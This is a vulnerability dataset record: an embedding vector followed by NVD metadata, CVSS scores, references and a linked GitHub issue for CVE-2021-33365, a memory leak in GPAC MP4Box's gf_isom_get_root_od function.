0.007682883180677891, 0.003422896610572934, -0.01302650012075901, -0.0015958227450028062, 0.006421514321118593, 0.011023599654436111, 0.010725458152592182, 0.027795983478426933, 0.009754586033523083, -0.011421121656894684, 0.004919338505715132, 0.0030253741424530745, 0.021466204896569252, -0.012216166593134403, -0.0010396738070994616, 0.020992236211895943, -0.00383761920966208, -0.010350869968533516, 0.014639523811638355, -0.00195703306235373, 0.006929884199053049, -0.016558334231376648, -0.008546729572117329, -0.016405440866947174, -0.010832482948899269, -0.010878351517021656, 0.0037439721636474133, 0.015472792088985443, -0.013775677420198917, 0.009219460189342499, -0.0035987235605716705, -0.005037831142544746, -0.014478986151516438, -0.0070598432794213295, -0.00023280378081835806, -0.0015165094519034028, -0.014196133241057396, 0.011696329340338707, -0.006035459227859974, 0.026741020381450653, -0.009922768920660019, 0.01337815448641777, -0.051372114568948746, -0.022154225036501884, 0.014203778468072414, 0.007392385974526405, 0.004403324332088232, 0.02253645844757557, -0.011252939701080322, -0.008516151458024979, 0.022154225036501884, 0.0010262955911457539, -0.0015107758808881044, 0.005301571451127529, 0.010465539060533047, -0.01093950867652893, -0.009716362692415714, 0.011612238362431526, -0.019983140751719475, -0.004800846334546804, -0.0025590499863028526, -0.006872549187391996, 0.0025150931905955076, -0.0033216048032045364, -0.003627391066402197, 0.0288662351667881, -0.012162653729319572, -0.008890739642083645, 0.021328601986169815, -0.0026278519071638584, -0.0160079188644886, -0.006486494094133377, 0.006593519356101751, -0.01308765821158886, -0.022337695583701134, -0.008837226778268814, 0.0011744109215214849, 0.008646110072731972, 0.014012661762535572, 0.028315819799900055, -0.00434216670691967, -0.000026383035219623707, -0.010213266126811504, 0.002518915571272373, -0.01058785431087017, -0.020564135164022446, -0.005450642667710781, 0.04186215624213219, -0.011038889177143574, 0.0038834873121231794, -0.009150657802820206, 0.0044606588780879974, 0.013286419212818146, -0.017445113509893417, 0.002861014101654291, -0.016512464731931686, 0.017353378236293793, 0.014991178177297115, 0.008279167115688324, -0.020029008388519287, -0.013018855825066566, 0.012453150935471058, 0.012147365137934685, -0.008240943774580956, 0.005878743715584278, 0.001558555057272315, -0.0020545022562146187, 0.01535047683864832, 0.009769875556230545, -0.0010740747675299644, 0.024141836911439896, 0.017047591507434845, 0.004686176776885986, 0.01164281740784645, -0.02522737719118595, -0.027230279520154, -0.029584834352135658, -0.015426923520863056, -0.006241864990442991, 0.033116668462753296, -0.023163320496678352, 0.0037879289593547583, -0.004491237923502922, 0.00983103271573782, -0.011726908385753632, 0.014800061471760273, -0.02946252003312111, 0.010305001400411129, 0.0019417436560615897, -0.013752743601799011, 0.004357456229627132, 0.027536064386367798, -0.009800453670322895, -0.00557295698672533, -0.000022127707779873163, 0.008584952913224697, -0.004433902911841869, 0.0029546611476689577, -0.006551473401486874, -0.022047199308872223, 0.0014285958604887128, 0.012682490982115269, -0.011826288886368275, -0.011765131726861, -0.005282460246235132, -0.0015595105942338705, -0.010228554718196392, -0.002753988839685917, -0.012445506639778614, -0.01114591397345066, 0.0009531935211271048, 0.007889289408922195, 0.01379096694290638, 0.00278838980011642, -0.0008772247238084674, 0.010312646627426147, -0.0041166492737829685, -0.015365766361355782, 0.013760387897491455, -0.010511407628655434, 0.014853574335575104, 0.024722829461097717, -0.006318311672657728, 0.002081258688122034, 0.021252155303955078, 0.013584560714662075, -0.002635496435686946, 0.02005958743393421, -0.009219460189342499, -0.018989335745573044, -0.011352320201694965, -0.028560450300574303, -0.015916181728243828, 0.0006669965805485845, -0.025319114327430725, 0.006001058034598827, -0.0003987168020103127, -0.005783185362815857, 0.0014572632499039173, 0.007185980211943388, -0.006520894821733236, -0.012606044299900532, -0.0011868334840983152, 0.0012250567087903619, -0.01241492759436369, -0.02194017358124256, 0.03314724564552307, -0.007594969589263201, 0.0021099261939525604, 0.021450916305184364, -0.010924219153821468, 0.00789693370461464, -0.0006306844297796488, 0.016619490459561348, -0.006933706812560558, -0.016328994184732437, -0.0027616333682090044, -0.010748391970992088, 0.001255635404959321, -0.004109004512429237, 0.0025609610602259636, 0.02200133167207241, 0.010603142902255058, -0.01118413731455803, -0.022200092673301697, -0.007614081259816885, 0.0000033520041142764967, 0.017705032601952553, 0.00935706403106451, 0.004808491095900536, -0.014456052333116531, 0.0152816753834486, -0.022200092673301697, -0.01720048487186432, 0.0009976280853152275, -0.009135368280112743, 0.01759800687432289, -0.0039369999431073666, -0.02189430594444275, 0.00038462196243926883, 0.028499292209744453, 0.006222753319889307, -0.006138661876320839, -0.0017955395160242915, -0.0307468231767416, -0.022215381264686584, 0.020747607573866844, 0.013446956872940063, 0.022215381264686584, -0.003724860493093729, -0.015449857339262962, -0.017322799190878868, -0.0024520247243344784, -0.0027042983565479517, 0.00040660036029294133, 0.006555296014994383, -0.00003461000233073719, -0.018683549016714096, 0.024493491277098656, -0.0026202071458101273, 0.04473654925823212, 0.029737727716565132, 0.006318311672657728, 0.01132174115628004, -0.004999607801437378, -0.0032680921722203493, 0.01382154505699873, -0.0009555824799463153, -0.011956248432397842, -0.0007162090623751283, 0.03229104354977608, 0.0011753664584830403, 0.02564018964767456, -0.0068801939487457275, -0.00007811887189745903, -0.001294814283028245, 0.007942801341414452, 0.014356671832501888, 0.030318722128868103, -0.0013320819707587361, 0.004537105560302734, -0.0017563606379553676, -0.008883094415068626, -0.007996314205229282, -0.007476477418094873, -0.014861218631267548, 0.012690135277807713, 0.018102554604411125, 0.0031744451262056828, -0.01565626449882984, -0.005053120199590921, 0.02048768848180771, -0.010045083239674568, 0.0052404142916202545, 0.000293124932795763, -0.012743648141622543, -0.006650854367762804, -0.007568213157355785, -0.006918417289853096, 0.02119099721312523, 0.010908929631114006, -0.042748939245939255, 0.020854633301496506, 0.005324505735188723, 0.0002292203571414575, -0.02518150955438614, 0.0010071839205920696, -0.01282009482383728, 0.013668651692569256, 0.021557940170168877, -0.0306245069950819, -0.02212364599108696, -0.005863454192876816, -0.004120471887290478, 0.0026641639415174723, -0.010610788129270077, -0.005374195985496044, 0.02745961770415306, 0.021680256351828575, -0.02317860908806324, 0.0015442213043570518, -0.04011917486786842, -0.01417319942265749, -0.026603417471051216, 0.0018786751898005605, 0.03748941421508789, -0.028269952163100243, -0.018622390925884247, -0.00812627375125885, -0.016741804778575897, 0.008095694705843925, 0.011665751226246357, -0.007476477418094873, -0.026786888018250465, -0.02664928510785103, 0.0034783203154802322, -0.013057079166173935, -0.021114550530910492, -0.0013750832295045257, 0.01041202712804079, -0.01276658196002245, -0.004995785187929869, 0.0160079188644886, -0.009915123693645, -0.0080039594322443, -0.011665751226246357, -0.0021405047737061977, -0.004200740717351437, -0.003143866313621402, -0.01848478801548481, -0.015686841681599617, 0.0009216592879965901, -0.007010153029114008, -0.015747999772429466, 0.005427708383649588, 0.015625685453414917, -0.010213266126811504, 0.012430217117071152, -0.026603417471051216, 0.0010033616563305259, -0.007293005473911762, 0.01837776228785515, -0.009234748780727386, -0.0021022814325988293, 0.007965736091136932, 0.009433510713279247, -0.019631486386060715, -0.0073082949966192245, 0.0003688548458740115, -0.02301042713224888, -0.004349811468273401, -0.02206248790025711, -0.014830640517175198, 0.00031390885123983026, 0.035593535751104355, -0.002557138679549098, -0.010580209083855152, 0.030028223991394043, 0.0050492980517446995, -0.02993648871779442, -0.020961657166481018, 0.022398853674530983, 0.0019780558068305254, -0.016527755185961723, 0.005439175758510828, -0.00566087057814002, -0.020380662754178047, -0.0045332834124565125, 0.009639916010200977, -0.0018719860818237066, -0.022031910717487335, -0.02119099721312523, -0.019509172067046165, -0.0012432128423824906, -0.007541457191109657, 0.004196918103843927, -0.004602085333317518, 0.024676961824297905, 0.004384212661534548, -0.004349811468273401, 0.0065400064922869205, 0.006134839728474617, 0.00830210093408823, -0.00045246831723488867, 0.007904578000307083, 0.012132075615227222, 0.013454601168632507, 0.0008829582366161048, -0.014815350994467735, -0.03504312038421631, 0.027979455888271332, -0.010327935218811035, -0.004242786206305027, 0.004288654308766127, -0.0108859958127141, -0.006215108558535576, 0.0007286316249519587, -0.0023755780421197414, -0.004846714437007904, -0.016328994184732437, -0.02223067171871662, -0.011604594066739082, -0.004047847352921963, 0.007342695724219084, 0.01114591397345066, -0.0076408376917243, 0.01302650012075901, -0.0014715970028191805, -0.018515367060899734, -0.016680648550391197, 0.009158303029835224, 0.013844478875398636, -0.00016185178537853062, -0.03816214203834534, -0.008607886731624603, -0.014685391448438168, 0.030670376494526863, -0.0011868334840983152, -0.0006392846698872745, -0.0270468071103096, -0.0033120489679276943, 0.005462109576910734, -0.009769875556230545, -0.01824015937745571, -0.007380919065326452, 0.018102554604411125, -0.02088521048426628, -0.01171161886304617, -0.006604986265301704, 0.022322406992316246, -0.009250038303434849, 0.008172141388058662, 0.009838677011430264, 0.0021003703586757183, 0.010312646627426147, 0.020686449483036995, 0.016650069504976273, -0.0013559715589508414, 0.012972988188266754, 0.0039255330339074135, -0.013538693077862263, -0.011833933182060719, -0.011772776022553444, -0.0028036790899932384, 0.012346126139163971, -0.008416770957410336, -0.020992236211895943, -0.005615002941340208, -0.012552531436085701, 0.013240550644695759, 0.027245568111538887, -0.014761838130652905, 0.011459344998002052, -0.010381448082625866, -0.013385799713432789, 0.006257154047489166, -0.021389758214354515, -0.0015824446454644203, -0.010366158559918404, -0.00526717072352767, -0.01614552177488804, 0.005244236905127764, -0.025395561009645462, -0.025548454374074936, 0.003021551761776209, -0.012086207047104836, -0.028545159846544266, 0.007518522907048464, -0.01660420186817646, 0.030777400359511375, -0.013691586442291737, -0.024982748553156853, -0.008019248023629189, 0.0015595105942338705, -0.008821937255561352, 0.02171083353459835, -0.0361439511179924, 0.002966128056868911, -0.02375960350036621, -0.010029793716967106, 0.019264543429017067, 0.008309745229780674, -0.011596948839724064, 0.003982868045568466, -0.02588481828570366, -0.014326092787086964, 0.011703974567353725, 0.012957698665559292, -0.015358122065663338, 0.02369844540953636, -0.02042653225362301, -0.005951367784291506, -0.005202190950512886, -0.001995256170630455, -0.022567035630345345, 0.0019379212753847241, 0.00041113936458714306, -0.040700171142816544, 0.008722556754946709, -0.010633721947669983, -0.004391856957226992, 0.0023602887522429228, -0.008753135800361633, -0.023576131090521812, -0.0041242940351367, 0.012537241913378239, 0.010503762401640415, -0.003889220766723156, 0.0034993430599570274, -0.003283381462097168, 0.006463559810072184, -0.008791359141469002, -0.009433510713279247, 0.007098066620528698, 0.01457836665213108, -0.004640308674424887, -0.00001609559330972843, 0.012109141796827316, 0.016359573230147362, -0.0013894169824197888, 0.015702132135629654, 0.01071016862988472, 0.014020306058228016, -0.005255703814327717, 0.000052019520808244124, -0.0026832756120711565, 0.007434431929141283, 0.003975223284214735, -0.0031362217850983143, 0.012514308094978333, -0.002973772818222642, 0.006555296014994383, -0.0004859137116000056, 0.008309745229780674, -0.01294240914285183, 0.004261897876858711, 0.012881251983344555, -0.006054570898413658, -0.00028428577934391797, -0.003273825626820326, 0.01918809674680233, -0.0020946369040757418, 0.00008958586113294587, -0.003713393583893776, 0.009494667872786522, 0.025793083012104034, 0.007705817464739084, 0.011558725498616695, -0.010197976604104042, -0.0006282954709604383, 0.011665751226246357, -0.0024195348378270864, 0.016344282776117325, -0.014616589993238449, 0.025594322010874748, 0.005183079279959202, 0.006815214175730944, -0.0011868334840983152, 0.006245687138289213, 0.002885859226807952, 0.015189939178526402, -0.004483593162149191, 0.011703974567353725, 0.02482985518872738, 0.00830210093408823, 0.0037286828737705946, -0.000039805981941754, -0.02082405425608158, -0.007644659839570522, 0.010725458152592182, -0.018698837608098984, 0.002763544674962759, 0.004804668948054314, -0.003082709154114127, 0.005232769530266523, -0.003591079032048583, 0.04284067451953888, -0.008523795753717422, -0.012391993775963783, -0.01026677805930376, 0.009578758850693703, 0.0024061566218733788, 0.010167397558689117, 0.009823388420045376, 0.0068840160965919495, 0.009487022645771503, -0.0017974507063627243, -0.009272972121834755, -0.014119686558842659, 0.013508114032447338, -0.012613688595592976, -0.0000038111318190203747, 0.011092402040958405, 0.008355613797903061, -0.010847772471606731, 0.01619138941168785, 0.0016522021032869816, -0.002801767783239484, -0.006119550205767155, 0.024783987551927567, -0.012376704253256321, 0.00047564119449816644, 0.025380270555615425, 0.009701073169708252, 0.007170691154897213, -0.004151050467044115, 0.01683354191482067, -0.021695544943213463, 0.01567155309021473, -0.0014228622894734144, -0.009464088827371597, -0.009953347034752369, 0.00956346932798624, 0.0031362217850983143, -0.0024883367586880922, -0.0010434960713610053, 0.005909322295337915, 0.0012355681974440813, -0.0026507857255637646, 0.018683549016714096, -0.00030435301596298814, 0.014532499015331268, -0.0001894442248158157, 0.01171161886304617, -0.0015212873695418239, 0.002622118452563882, -0.005546201020479202, -0.0017487159930169582, 0.009525245986878872, -0.02230711840093136, -0.006425336468964815, -0.008844872005283833, 0.004349811468273401, 0.01149756833910942, 0.0048734708689153194, 0.01053434144705534, 0.0075643910095095634, 0.022689349949359894, 0.01842362992465496, 0.008279167115688324, -0.005393307656049728, -0.029095575213432312, 0.023499684408307076, 0.0005948501056991518, -0.001281436183489859, -0.0016006006626412272, 0.008691978640854359, -0.010335580445826054, 0.005676160100847483, 0.004143405705690384, -0.007434431929141283, -0.0009297817596234381, 0.005878743715584278, -0.019509172067046165, 0.00671965628862381, -0.017919082194566727, 0.013515759259462357, 0.009777519851922989, -0.0033751174341887236, -0.0011409654980525374, -0.015388700179755688, 0.012346126139163971, -0.004831424914300442, -0.002180639188736677, 0.015556883066892624, 0.0025246490258723497, -0.024141836911439896, 0.006773168686777353, 0.0013913280563428998, 0.010595498606562614, -0.028789788484573364, 0.01294240914285183, 0.01346989069133997, -0.020686449483036995, -0.03333071619272232, -0.020579423755407333, 0.0037401497829705477, -0.00579465227201581, -0.0029546611476689577, 0.02487572282552719, -0.0013072368456050754, 0.017093459144234657, 0.012720714323222637, -0.0010253400541841984, 0.017154617235064507, 0.005634114611893892, 0.013339932076632977, -0.013959148898720741, -0.017154617235064507, -0.001421906752511859, 0.00012058256834279746, -0.0013741275761276484, 0.004502704832702875, -0.015014111995697021, 0.018882310017943382, 0.012705424800515175, 0.015610395930707455, -0.02652697078883648, -0.02739846147596836, -0.02012074552476406, -0.017062881961464882, -0.0082485880702734, 0.0029107043519616127, 0.012521953321993351, 0.00023148985928855836, -0.0033311606384813786, -0.014616589993238449, 0.0135234035551548, 0.002543760696426034, 0.001563332974910736, -0.02048768848180771, -0.014203778468072414, -0.014150265604257584, 0.007415320258587599, 0.014295513741672039, -0.0049728513695299625, 0.022964557632803917, 0.013813900761306286, -0.013768032193183899, -0.0006540961912833154, -0.019111650064587593, 0.0077363960444927216, 0.011252939701080322, -0.01836247369647026, -0.004380390048027039, 0.006490316241979599, -0.029095575213432312, 0.019631486386060715, -0.008263877592980862, -0.011826288886368275, 0.01308765821158886, -0.009173591621220112, -0.004777912516146898, 0.001993345096707344, 0.008179786615073681, -0.0014649080112576485, 0.018163712695240974, -0.008325034752488136, -0.03409518301486969, -0.010190331377089024, -0.008577308617532253, 0.0018031841609627008, 0.014035595580935478, -0.009808098897337914, 0.008714912459254265, 0.024493491277098656, -0.0037382387090474367, 0.005538556259125471, -0.01093950867652893, -0.021496783941984177, -0.00003269883745815605, 0.009892189875245094, 0.007369452156126499, -0.0036751702427864075, -0.0028724810108542442, -0.0028495469596236944, 0.01317174918949604, 0.01590089313685894, -0.001939832465723157, -0.001167721813544631, -0.02048768848180771, -0.0036751702427864075, -0.004376567900180817, 0.004804668948054314, 0.011122980155050755, -0.017613297328352928, -0.01229261327534914, 0.004372745286673307, -0.0025609610602259636, 0.0107942596077919, 0.009502312168478966, 0.004674709402024746, -0.007889289408922195, -0.01100831013172865, -0.01282009482383728, -0.01943272538483143, -0.013309353031218052, -0.024906301870942116, -0.0014123509172350168, -0.013018855825066566, 0.002459669252857566, 0.012491374276578426, 0.004930805880576372, -0.004525638651102781, -0.01848478801548481, 0.0009694384643808007, -0.013676296919584274, -0.003451563883572817, -0.017215773463249207, 0.015167005360126495, 0.012537241913378239, -0.0255331639200449, -0.001267102430574596, 0.022322406992316246, -0.0052136583253741264, -0.019279832020401955, -0.0013359043514356017, -0.02142033725976944, 0.004712932743132114, -0.0290497075766325, 0.010373803786933422, -0.019631486386060715, 0.008470282889902592, 0.000264696340309456, 0.009639916010200977, 0.014624234288930893, 0.015541593544185162, 0.0010444517247378826, -0.0020143678411841393, 0.009571114555001259, 0.015082914382219315, 0.006459737662225962, 0.005527089349925518, 0.012812450528144836, -0.008271521888673306, 0.015243452042341232, 0.005943723022937775, 0.014540143311023712, 0.016588911414146423, 0.001123765017837286, 0.0021405047737061977, 0.012567820958793163, 0.005087521392852068, -0.0029030595906078815, 0.010419671423733234, 0.01146699022501707, -0.008294455707073212, 0.008187430910766125, 0.011168847791850567, 0.002797945635393262, -0.007912223227322102, 0.006979574449360371, -0.005519444588571787, -0.006169240456074476, 0.00850850623100996, 0.0010721635771915317, -0.008042181842029095, 0.011933314613997936, 0.006776990834623575, -0.010289711877703667, 0.022398853674530983, -0.003350272309035063, 0.006150128785520792, -0.006979574449360371, -0.004579151514917612, -0.021817859262228012, 0.01097008679062128, -0.009869256056845188, 0.04229025915265083, 0.010778970085084438, 0.021374469622969627, -0.009922768920660019, -0.011023599654436111, 0.0061119054444134235, 0.008439704775810242, -0.0007663771393708885, -0.039354708045721054, -0.010075662285089493, -0.008172141388058662, 0.006532361730933189, 0.0013903725193813443, -0.002434824127703905, -0.010526697151362896, 0.008279167115688324, -0.0009508045623078942, -0.0002752077707555145, -0.011963892728090286, 0.009716362692415714, 0.006517072673887014, 0.02077818661928177, 0.007143934722989798, 0.0217719916254282, 0.0127360038459301, -0.022505879402160645, 0.0064406259916722775, -0.008615531958639622, 0.023392658680677414, -0.009020699188113213, -0.01267484575510025, -0.023209188133478165, 0.01842362992465496, -0.002029657131060958, -0.005809941794723272, 0.018744707107543945, -0.031954679638147354, 0.00900540966540575, 0.002226507291197777, 0.012284968979656696, -0.009892189875245094, 0.002897326136007905, -0.014180844649672508, 0.003461119718849659, 0.004655597731471062, 0.016328994184732437, 0.019799670204520226, -0.0032566250301897526, -0.005622647237032652, -0.0026393188163638115, -0.004919338505715132, 0.01889759860932827, 0.010801904834806919, 0.003237513592466712, -0.011444056406617165, -0.01554923877120018, -0.0033082265872508287, -0.003917888272553682, -0.015564527362585068, 0.018209580332040787, 0.01184922270476818, 0.01285067293792963, -0.02299513667821884, 0.0033082265872508287, 0.01041202712804079, 0.003369383979588747, -0.013309353031218052, -0.023331502452492714, 0.016757095232605934, -0.015151715837419033, -0.0049766735173761845, 0.0033216048032045364, -0.0008351791184395552, -0.0011572104413062334, -0.014379605650901794, -0.016176100820302963, -0.012567820958793163, 0.003503165440633893, 0.0031132877338677645, 0.0007735440158285201, 0.013370510190725327, 0.0402720682322979, 0.007373274303972721, 0.008753135800361633, -0.01619138941168785, 0.009624626487493515, -0.014639523811638355, -0.003285292536020279, -0.01249901857227087, 0.01276658196002245, 0.026205893605947495, -0.0013301707804203033, -0.005592068657279015, 0.021664965897798538, -0.009250038303434849, -0.0022953092120587826, 0.004858181346207857, -0.003436274593695998, 0.006241864990442991, -0.005695271771401167, 0.015159361064434052, 0.003096087370067835, 0.012460796162486076, 0.006142484489828348, -0.013095302507281303, -0.0012202787911519408, 0.012315547093749046, 0.0076484824530780315, 0.004552395083010197, 0.015977339819073677, 0.0073082949966192245, 0.008737846277654171, 0.008363258093595505, -0.005431530997157097, -0.008133918046951294, -0.003636946901679039, 0.0005222258623689413, 0.006329778581857681, 0.011015955358743668, 0.016971144825220108, -0.0031304883304983377, -0.0163137037307024, 0.005943723022937775, 0.002534204861149192, -0.009983926080167294, 0.0008643243927508593, 0.003747794544324279, -0.005939900875091553, 0.004200740717351437, -0.0108859958127141, 0.01577857881784439, 0.01093950867652893, 0.0020392129663378, -0.012843028642237186, -0.010756036266684532, 0.01141347736120224, 0.025563742965459824, -0.009800453670322895, -0.005412419326603413, -0.0032776480074971914, -0.0008829582366161048, -0.017873214557766914, -0.01872941665351391, 0.021374469622969627, 0.009013053961098194, -0.0038280633743852377, 0.0090359877794981, -0.009135368280112743, 0.0017162261065095663, 0.0038739314768463373, -0.0024730474688112736, -0.005121922120451927, 0.035593535751104355, 0.021817859262228012, -0.014196133241057396, 0.0005719161126762629, 0.005507977679371834, 0.0010492295259609818, -0.020166613161563873, 0.024799276143312454, 0.0016655803192406893, -0.009502312168478966, 0.0008886917494237423, -0.021405048668384552, -0.002004812005907297, 0.01596204936504364, -0.013477535918354988, -0.002415712457150221, -0.015342832542955875, -0.009876900352537632, 0.00548886600881815, -0.025563742965459824, -0.017322799190878868, 0.016206679865717888, -0.013683941215276718, 0.00539712980389595, -0.03914066031575203, -0.006264798808842897, -0.00632213382050395, 0.015855025500059128, 0.01895875670015812, -0.013882702216506004, -0.0019551217555999756, -0.01548808068037033, -0.033483609557151794, 0.013164104893803596, 0.01695585623383522, 0.009334130212664604, -0.009808098897337914, 0.004831424914300442, -0.005374195985496044, 0.008409125730395317, -0.020808763802051544, 0.0007501322543248534, 0.002090814523398876, -0.009066566824913025, 0.030792690813541412, -0.004525638651102781, -0.005079876631498337, 0.03027285262942314, 0.012315547093749046, 0.008202720433473587, -0.004426258150488138, 0.004839069675654173, 0.0004883026704192162, 0.011872156523168087, -0.0012317458167672157, -0.018790574744343758, 0.016558334231376648, -0.02476869896054268, -0.016711227595806122, 0.004716755356639624, -0.005855809431523085, -0.006952818017452955, 0.0035222771111875772, 0.02194017358124256, 0.007912223227322102, 0.01211678609251976, 0.0007754552061669528, 0.007461187895387411, -0.00018717472266871482, -0.0054162414744496346, -0.01006037276238203, 0.022322406992316246, -0.00707131065428257, -0.000903981039300561, -0.0073962085880339146, 0.001317748217843473, -0.022979848086833954, -0.003247069427743554, 0.008347968570888042, 0.0030463968869298697, -0.008110984228551388, -0.01141347736120224, 0.006509427912533283, -0.013225262053310871, 0.00522130262106657, 0.004181629046797752, 0.008676689118146896, 0.002511270809918642, -0.003944644704461098, 0.0012957698199898005, 0.02305629476904869, 0.004965206608176231, 0.02952367626130581, -0.002474958775565028, 0.0010855416767299175, -0.020350085571408272, -0.009173591621220112, 0.020044298842549324, -0.005913144443184137, -0.012002116069197655, 0.0007840554462745786, -0.022551747038960457, -0.025655478239059448, 0.023316211998462677, 0.030548060312867165, 0.013882702216506004, 0.013638073578476906, -0.004066959023475647, 0.00239086733199656, 0.004063136875629425, 0.015411634929478168, 0.012155009433627129, 0.02005958743393421, 0.0019226319855079055, 0.009609337896108627, 0.00561882508918643, -0.02582366205751896, -0.010679589584469795, 0.05439940094947815, 0.01211678609251976, 0.008454994298517704, 0.004877293016761541, 0.0011944781290367246, 0.01408146321773529, -0.007243315223604441, 0.0021538829896599054, -0.009639916010200977, 0.012284968979656696, 0.008454994298517704, 0.013599850237369537, 0.010335580445826054, -0.019921984523534775, -0.010098596103489399, 0.006864904426038265, 0.005630291998386383, 0.0025494941510260105, -0.005072231870144606, -0.012781871482729912, -0.01637486182153225, -0.01608436368405819, 0.014601300470530987, -0.017460403963923454, -0.003061686409637332, 0.002973772818222642, 0.006620275322347879, -0.025426138192415237, 0.004498882219195366, -0.0026374077424407005, 0.028973260894417763, -0.018576523289084435, -0.009097144939005375, -0.0015776667278259993, 0.010014504194259644, 0.0037630838342010975, 0.01755213923752308, 0.014119686558842659, 0.010962442494928837, -0.010496118105947971, -0.008936607278883457, 0.012460796162486076, -0.0006091838586144149, 0.014180844649672508, 0.009272972121834755, 0.010297357104718685, -0.00795044656842947, 0.004510349594056606, -0.0018031841609627008, -0.011375254020094872, 0.019738512113690376, 0.01168104074895382, -0.0039369999431073666, -0.00373250525444746, 0.012965342961251736, 0.0027042983565479517, -0.0010234288638457656, -0.020502978935837746, -0.006750234868377447, -0.02030421607196331, -0.009731652215123177, -0.008730201981961727, -0.02336208149790764, -0.007518522907048464, -0.034003447741270065, -0.006555296014994383, -0.005141033791005611, 0.005301571451127529, -0.020900500938296318, 0.0305633507668972, 0.0029011485166847706, 0.004598263185471296, -0.02288811281323433, 0.006677610334008932, -0.004540928173810244, -0.014471340924501419, 0.026893913745880127, 0.008760780096054077, 0.00028524137451313436, 0.005890210624784231, 0.000021545398340094835, -0.016864119097590446, 0.017934372648596764, -0.007526167668402195, 0.001193522592075169, -0.008531440980732441, -0.008019248023629189, -0.0116733955219388, 0.0002866747381631285, 0.021450916305184364, 0.008347968570888042, 0.006425336468964815, -0.02617531642317772, -0.021114550530910492, 0.022154225036501884, -0.0037172159645706415, 0.009983926080167294, -0.002404245547950268, 0.013072368688881397, 0.011138269677758217, -0.0020105454605072737, 0.01772032119333744, -0.02406539022922516, 0.002534204861149192, 0.006153951399028301, 0.012361414730548859, 0.015916181728243828, -0.013538693077862263, -0.009769875556230545, 0.0000020567420051520457, 0.020931078121066093, 0.010450250469148159, 0.00008176202391041443, 0.01499882247298956, 0.018148422241210938, -0.013141170144081116, 0.0023755780421197414, 0.009624626487493515, 0.012713069096207619, -0.0032566250301897526, 0.00403638044372201, -0.014975888654589653, 0.0254720076918602, 0.023667866364121437, -0.0025380270089954138, -0.017322799190878868, 0.011872156523168087, 0.016451308503746986, -0.009571114555001259, 0.0107942596077919, -0.01153579168021679, -0.0001476374891353771, 0.028178216889500618, -0.0006349845789372921, -0.01346989069133997, 0.016757095232605934, -0.013179393485188484, 0.0006569629767909646, 0.016466597095131874, -0.0006531406543217599, 0.012835384346544743, 0.024340597912669182, -0.008562019094824791, 0.025838950648903847, -0.017460403963923454, 0.00391406612470746, -0.0163137037307024, 0.004238964058458805, -0.0044568367302417755, -0.016802962869405746, 0.008844872005283833, 0.0038051295559853315, 0.002689009066671133, -0.013209972530603409, -0.005867276340723038, 0.0053283278830349445, 0.0237137358635664, 0.020090166479349136, -0.005966657306998968, -0.00482760276645422, -0.012353770434856415, 0.01579386740922928, 0.01590089313685894, 0.014761838130652905, -0.00005127297481521964, 0.003405696013942361, -0.003891131840646267, -0.014356671832501888, 0.008141563273966312, -0.0006072726682759821, -0.011994471773505211, -0.017353378236293793, -0.000897291989531368, -0.014234356582164764, 0.013355220668017864, 0.010251489467918873, 0.020961657166481018, -0.01666535809636116, 0.011459344998002052, 0.004747333936393261, 0.00812627375125885, 0.004024913534522057, -0.01302650012075901, 0.01184922270476818, 0.04265720397233963, 0.006803747266530991, 0.005370373837649822, 0.004051669966429472, 0.007189802825450897, -0.0011275873985141516, -0.010694879107177258, -0.011994471773505211, 0.005324505735188723, -0.0015155537985265255, -0.009395287372171879, 0.024141836911439896, 0.0076637715101242065, -0.0020946369040757418, 0.021282732486724854, -0.015992628410458565, 0.00970871839672327, -0.03320840373635292, -0.021986041218042374, -0.004980496130883694 ]
325
CVE-2021-33365
2021-09-13T20:15:08.627000
Memory leak in the gf_isom_get_root_od function in MP4Box in GPAC 1.0.1 allows attackers to read memory via a crafted file.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "[email protected]", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "NONE", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/commit/984787de3d414a5f7d43d0b4584d9469dff2a5a5" }, { "source": "[email protected]", "tags": [ "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/1784" }, { "source": "[email protected]", "tags": null, "url": "https://www.debian.org/security/2023/dsa-5411" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gpac:gpac:1.0.1:*:*:*:*:*:*:*", "matchCriteriaId": "82DD2D40-0A05-48FD-940D-32B4D8B51AB3", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/gpac/gpac/issues/1784
[ "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "gpac", "gpac" ]
null
[security]memory leak in MP4Box gf_isom_get_root_od
https://api.github.com/repos/gpac/gpac/issues/1784/comments
0
2021-05-08T05:14:42
2023-09-22T06:08:59Z
https://github.com/gpac/gpac/issues/1784
880,296,904
1,784
true
This is a GitHub Issue repo:gpac owner:gpac Title : [security]memory leak in MP4Box gf_isom_get_root_od Issue date: --- start body --- None --- end body ---
158
